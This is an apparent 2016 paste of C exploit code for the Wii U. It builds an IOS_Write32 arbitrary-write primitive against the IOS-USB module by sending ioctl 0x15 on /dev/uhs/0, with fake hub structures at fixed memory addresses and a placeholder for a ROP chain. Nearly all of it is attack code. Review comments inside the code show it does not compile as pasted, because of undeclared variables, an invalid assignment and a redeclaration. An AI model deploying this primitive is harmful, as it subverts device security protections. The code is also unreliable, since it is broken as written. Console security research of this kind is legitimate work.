IOS-USB exploitation

a guest
Oct 16th, 2016
  1. #include "../../../libwiiu/src/coreinit.h"
  2. #include "../../../libwiiu/src/mem.h"
  3. #include "../../../libwiiu/src/draw.h"
  4. #include "../../../libwiiu/src/types.h"
  5.  
/* Forward declarations. _start is the payload entry point (jumped to by
 * whatever loads this file, not called from C); IOS_Write32 is defined
 * further down and is the primitive the comment inside _start refers to. */
void _start();
int IOS_Write32(int uhs_dev_node, unsigned int addr, unsigned int value);
  8.  
void _start()
{
    /* Load a good stack: pivot r1 to a fixed address before any local is
     * touched. The constant is environment-specific (presumably a region
     * already known to be mapped and writable here); nothing on this page
     * says where it comes from — confirm against the loader that jumps here. */
    asm(
        "lis %r1, 0x1ab5 ;"
        "ori %r1, %r1, 0xd138 ;"
    );

    /* Resolve coreinit exports by name. The results of OSDynLoad_Acquire and
     * OSDynLoad_FindExport are never checked, so a failed lookup leaves the
     * function pointers below uninitialised and the later calls jump to
     * garbage. coreinit_handle is local to _start; IOS_Write32 below uses the
     * same name but has no declaration for it in its own scope. */
    unsigned int coreinit_handle;
    OSDynLoad_Acquire("coreinit.rpl", &coreinit_handle);

    void(*_Exit)();
    void (*__PPCExit)();
    OSDynLoad_FindExport(coreinit_handle, 0, "_Exit", &_Exit);
    OSDynLoad_FindExport(coreinit_handle, 0, "__PPCExit", &__PPCExit); /* resolved but never called */

    /* IOS functions */
    int(*IOS_Open)(char *path, unsigned int mode);
    int(*IOS_Close)(int fd);
    OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Open", &IOS_Open);
    OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Close", &IOS_Close); /* resolved but never called: the node is never closed */

    int uhs_dev_node = IOS_Open("/dev/uhs/0", 0); // Open the uhs node; the result is not checked for a negative (error) value

    /* Now, you can insert here your ROP Chain into IOS-USB using IOS_Write32 calls */

    _Exit();

    while(1); /* only reached if _Exit returns */


}
  41.  
/* Intended (per its name and the comment in _start) as a single 32-bit write
 * into the IOS-USB side, driven through ioctl 0x15 on the /dev/uhs/0 node
 * with a fake root-hub structure and a scratch block laid out in MEM1.
 *
 * uhs_dev_node: fd returned by IOS_Open("/dev/uhs/0", 0) in _start.
 * addr:         target address; what is actually stored is addr - 24 (see below).
 * value:        the 32-bit word placed in buffer[1].
 * Returns:      as written, `ret`, which is not declared in this function — the
 *               ioctl result is held in return_value. Together with the other
 *               NOTE(review) items below, this block does not compile as pasted.
 */
int IOS_Write32(int uhs_dev_node, unsigned int addr, unsigned int value) {

    /* Memory functions. NOTE(review): coreinit_handle is a local of _start and
     * has no declaration in this scope. DCInvalidateRange, OSFreeToSystem and
     * OSEffectiveToPhysical are resolved here but never used. */
    void (*DCFlushRange)(void *buffer, uint32_t length);
    void (*DCInvalidateRange)(void *buffer, uint32_t length);
    void* (*OSAllocFromSystem)(uint32_t size, int align);
    void (*OSFreeToSystem)(void *ptr);
    uint32_t (*OSEffectiveToPhysical)(void *vaddr);
    OSDynLoad_FindExport(coreinit_handle, 0, "DCFlushRange", &DCFlushRange);
    OSDynLoad_FindExport(coreinit_handle, 0, "DCInvalidateRange", &DCInvalidateRange);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSAllocFromSystem", &OSAllocFromSystem);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSFreeToSystem", &OSFreeToSystem);
    OSDynLoad_FindExport(coreinit_handle, 0, "OSEffectiveToPhysical", &OSEffectiveToPhysical);

    int(*IOS_Ioctl)(int fd, uint32_t request, void *input_buffer, uint32_t input_buffer_len, void *output_buffer, uint32_t output_buffer_len);
    OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Ioctl", &IOS_Ioctl);


    uint32_t *buffer = (uint32_t*)OSAllocFromSystem(0x100, 0x10); // Alloc 0x100 bytes; a NULL result is not checked and the block is never freed
    memempty(buffer, 0x100); // Empty the new buffer (memempty presumably comes from mem.h — not visible on this page)

    /* Setup the buffer. NOTE(review): a braced list on the right-hand side of an
     * assignment is not valid C, so the next line is a compile error as pasted. */
    buffer[0] = {-0xBAF9C}; // Make IOS-USB to read at 0xF500002C // MEM1_MIDDLE + (24 + 8), it's the only way i managed for it to work
    buffer[1] = value;

    /* Fixed MEM1 addresses the ioctl handler is expected to dereference. */
    uint32_t *fake_root_hub = (uint32_t*)0xF500002C;
    uint32_t *temporary_data = (uint32_t*)0xF4500000; // MEM1 + 0x00500000

    fake_root_hub[78] = 0; // We have to declare it because if we don't IOS-USB will return an error ! (sometimes, crash)
    /* NOTE(review): MEM1_BASE is declared in "mem.h" (not visible here). If it is an
     * integer constant, `temporary_data - MEM1_BASE` is pointer arithmetic in units of
     * sizeof(uint32_t) followed by a pointer-to-integer conversion, not a byte offset —
     * confirm it yields the offset the handler expects. Same on temporary_data[8] below. */
    fake_root_hub[33] = temporary_data - MEM1_BASE; // declared on "mem.h"

    temporary_data[5] = 1; // IOS-USB check if temp_data[5] is declared so :/
    temporary_data[8] = temporary_data - MEM1_BASE;
    temporary_data[520] = addr - 24; // the caller's addr is stored with a 24-byte bias

    DCFlushRange(buffer, 0x70); // Flush the whole buffer (only the first 0x70 of the 0x100 bytes — matches the length given to IOS_Ioctl)
    DCFlushRange(fake_root_hub, 79 * 4); // Flush fake_root_hub from [0] to [78]
    DCFlushRange(temporary_data, 521 *4); // Flush temp_data to [0] to [520]

    /* NOTE(review): `i` is never declared and ctr is read uninitialised; since ctr is
     * otherwise unused, an optimiser may drop this busy loop entirely even if it compiled. */
    int ctr;
    for(i = 0; i < 0x20000; i++) ctr++; // Copied from gx2sploit // Wait a bit

    int return_value = IOS_Ioctl(uhs_dev_node, 0x15, buffer, 0x70, (void*)0, 0); // Perform the root_hub desactivation

    /* NOTE(review): second declaration of ctr in the same scope — a redeclaration error. */
    int ctr;
    for(i = 0; i < 0x20000; i++) ctr++; // Wait a bit, again

    return ret; // NOTE(review): `ret` is undeclared; return_value holds the ioctl result

}